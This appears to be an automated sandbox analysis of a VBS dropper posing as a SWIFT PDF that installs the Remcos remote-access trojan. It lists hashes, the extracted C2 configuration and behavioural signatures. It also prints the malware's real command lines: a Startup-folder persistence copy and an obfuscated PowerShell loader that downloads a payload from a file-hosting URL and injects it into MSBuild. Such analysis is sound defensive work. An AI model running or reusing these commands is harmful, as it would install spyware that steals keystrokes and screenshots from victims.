Analysis
max time kernel: 149s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 14-11-2024 07:07
Static task: static1
Behavioral task: behavioral1
Sample: SWIFT103202414111523339800111124.pdf.vbs
Resource: win7-20240729-en
General
Target: SWIFT103202414111523339800111124.pdf.vbs
Size: 1KB
MD5: 1571d85ecdbd26ac45e3f2639e7e4310
SHA1: b1dd5db95e88132a5052b451b757b9ce486bccc0
SHA256: 167887f979c648809aa8328edba96d972b401f74b06ee5026ea073efd4d9b432
SHA512: e0d9a19616e3762c67b0f2d24a92529c3bbd26f01938768c0d213470628df97e7f2bf6aa7c0bdf60018590862e500c1ad6bb6e4b0585b4be47d1b06dd9fb4bcf
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Extracted
remcos
NOV
alpha147.ddns.net:35890
audio_folder: MicRecords
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: vlc.exe
copy_folder: vlc
delete_file: false
hide_file: false
hide_keylog_file: false
install_flag: false
keylog_crypt: true
keylog_file: logs.dat
keylog_flag: false
keylog_folder: remcos
mouse_option: false
mutex: Rmc-1KOA72
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
startup_value: rmc
take_screenshot_option: false
take_screenshot_time: 5
Signatures

Remcos family

Blocklisted process makes network request (4 IoCs)
flow  pid   Process
2     3512  WScript.exe
8     3512  WScript.exe
26    2456  powershell.exe
28    2456  powershell.exe

Command and Scripting Interpreter: PowerShell (3 IoCs)
pid   Process
208   powershell.exe
3940  powershell.exe
2456  powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
description        ioc                                                                                                  Process
Key value queried  \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation  WScript.exe

Drops startup file (2 IoCs)
description                   ioc                                                                                      Process
File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs  WScript.exe
File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs  WScript.exe

Suspicious use of SetThreadContext (1 IoC)
description                          pid   Process         procid_target
PID 2456 set thread context of 4480  2456  powershell.exe  102

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 1 IoC)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc                                                          Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  MSBuild.exe

System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 2 IoCs)
Adversaries may check for Internet connectivity on compromised systems.
pid   Process
2828  PING.EXE
4752  cmd.exe

Runs ping.exe (1 TTPs, 1 IoC)
pid   Process
2828  PING.EXE

Script User-Agent (2 IoCs)
Uses user-agent string associated with script host/environment.
description             flow  ioc
HTTP User-Agent header  2     Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  8     Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses (8 IoCs)
pid   Process
208   powershell.exe
208   powershell.exe
3940  powershell.exe
3940  powershell.exe
2456  powershell.exe
2456  powershell.exe
2456  powershell.exe
2456  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
description              pid   Process
Token: SeDebugPrivilege  208   powershell.exe
Token: SeDebugPrivilege  3940  powershell.exe
Token: SeDebugPrivilege  2456  powershell.exe

Suspicious use of SetWindowsHookEx (1 IoC)
pid   Process
4480  MSBuild.exe

Suspicious use of WriteProcessMemory (25 IoCs)
description                       pid   Process         procid_target
PID 3512 wrote to memory of 4752  3512  WScript.exe     87
PID 3512 wrote to memory of 4752  3512  WScript.exe     87
PID 4752 wrote to memory of 2828  4752  cmd.exe         89
PID 4752 wrote to memory of 2828  4752  cmd.exe         89
PID 4752 wrote to memory of 208   4752  cmd.exe         97
PID 4752 wrote to memory of 208   4752  cmd.exe         97
PID 3512 wrote to memory of 3940  3512  WScript.exe     98
PID 3512 wrote to memory of 3940  3512  WScript.exe     98
PID 3940 wrote to memory of 2456  3940  powershell.exe  100
PID 3940 wrote to memory of 2456  3940  powershell.exe  100
PID 2456 wrote to memory of 1292  2456  powershell.exe  101
PID 2456 wrote to memory of 1292  2456  powershell.exe  101
PID 2456 wrote to memory of 1292  2456  powershell.exe  101
PID 2456 wrote to memory of 4480  2456  powershell.exe  102
PID 2456 wrote to memory of 4480  2456  powershell.exe  102
PID 2456 wrote to memory of 4480  2456  powershell.exe  102
PID 2456 wrote to memory of 4480  2456  powershell.exe  102
PID 2456 wrote to memory of 4480  2456  powershell.exe  102
PID 2456 wrote to memory of 4480  2456  powershell.exe  102
PID 2456 wrote to memory of 4480  2456  powershell.exe  102
PID 2456 wrote to memory of 4480  2456  powershell.exe  102
PID 2456 wrote to memory of 4480  2456  powershell.exe  102
PID 2456 wrote to memory of 4480  2456  powershell.exe  102
PID 2456 wrote to memory of 4480  2456  powershell.exe  102
PID 2456 wrote to memory of 4480  2456  powershell.exe  102
Processes

C:\Windows\System32\WScript.exe (PID 3512)
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT103202414111523339800111124.pdf.vbs"
- Blocklisted process makes network request
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory

  C:\Windows\System32\cmd.exe (PID 4752)
  Command line: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT103202414111523339800111124.pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory

    C:\Windows\system32\PING.EXE (PID 2828)
    Command line: ping 127.0.0.1 -n 10
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 208)
    Command line: powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT103202414111523339800111124.pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3940)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2456)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([sTrinG]$VErbosEPrEfeRencE)[1,3]+'X'-jOIn'') ( (('XZlimageUrl = 4qjhttps://1017.file'+'mail.com/api/file/get?file'+'key=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_v'+'id=fd4f614bb209c62'+'c173'+'0'+'945176a0904f 4qj;XZlwebClient = New'+'-Object System.Net.WebClient;XZlimageBytes = XZlwebClient.DownloadData(XZlimageUrl);XZlimageText = [System.T'+'ext.Encoding]::UTF8.GetSt'+'ring(XZlimageBytes);XZlstartFlag = 4qj<<BASE64_START>>4qj;XZlendFlag = 4qj<<BASE64_END>>4qj;XZl'+'startInde'+'x = XZlimageText.IndexOf(XZlstartFlag);XZlendIndex = XZlimageText.IndexOf(XZlendFlag);XZlstartIndex -ge 0 -and XZlendIndex'+' -gt XZlstartIndex'+';XZlstartIndex += XZlstartFlag.Length;XZlbase64Length = XZlendI'+'ndex - XZlstartIndex;XZlbase64Command = XZlimageText.Sub'+'string(XZlstartInde'+'x, XZlbase64Length);XZlbase64Reversed = -join (XZlbase64Command.ToCha'+'rArray() p3k ForEach-Object { XZl_ })[-1..-(XZlbase64Command.Length)];XZlcommandBytes = [System.Convert]::FromBase64String(XZlbase64Reversed);XZll'+'oadedAssembly = [System.Reflection.Assembly]::Load(XZlcommandBytes);XZlvaiMethod = '+'[dnlib.IO.Home].GetMethod(4qjVA'+'I4qj'+');XZlvaiMethod.Invoke(XZlnull, @(4qj0/LR9Cg/d/ee.e'+'tsap//:sptth4qj, 4qjd'+'esativado4qj, '+'4qjdesativado4qj, 4qjdesativado4qj, 4qjMSBuild4qj, 4qjdesativado4qj, 4qjdesativado4qj,4qjdesativado4qj,4qjdesativado4qj,4qjdesativado4qj,4qjdesativado4qj,'+'4qjdesa'+'tivado4qj,4qj14qj,4qjdesativado4qj));') -CRePlACe([chAr]88+[chAr]90+[chAr]108),[chAr]36 -REplace'4qj',[chAr]39 -REplace 'p3k',[chAr]124) )"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (PID 1292)
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (PID 4480)
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      - System Location Discovery: System Language Discovery
      - Suspicious use of SetWindowsHookEx